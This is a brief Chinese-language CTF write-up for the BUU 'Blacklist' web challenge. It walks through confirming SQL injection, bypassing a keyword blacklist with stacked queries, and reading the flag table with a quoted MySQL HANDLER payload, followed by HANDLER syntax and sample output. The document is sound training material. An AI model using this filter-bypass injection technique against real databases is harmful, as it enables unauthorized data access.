BUU web Blacklist
新增1’ 報錯確定存在sql注入
提交 1’# 返回正常
但提交 1’select# 返回黑名單
禁用了太多,考慮堆疊注入
查庫
查出表名
查欄位名
但由於禁用了select,prepare等關鍵字,後面就不知道怎麼做了
於是翻了大佬的wp:
發現HANDLER查詢效能好像比SELECT還更好,且未被過濾
附上大佬的payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
handler的使用:
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name CLOSE
//其中 HANDLER tbl_name OPEN AS example
//其後 HANDLER example READ index_name="example2"
幾個栗子:
mysql> handler test open as c; //開啟
Query OK, 0 rows affected (0.01 sec)
mysql> handler c read PRIMARY=(5); //查詢主健
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 5 | def | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)
mysql> handler c close; //關閉
Query OK, 0 rows affected (0.00 sec)
mysql> handler test open; //open
Query OK, 0 rows affected (0.00 sec)
mysql> handler test read data first; //data索引,第一個記錄
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)
mysql> handler test read data next; //下一個記錄
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 2 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)
mysql> handler test read data prev; //前一個記錄
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.01 sec)
mysql> handler test read data last; //最後一條記錄
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 9 | yza | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)
mysql> handler test read data=("yza");
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 9 | yza | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.01 sec)
mysql> handler test read data=("abc") limit 5;
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
| 2 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
2 rows in set (0.00 sec)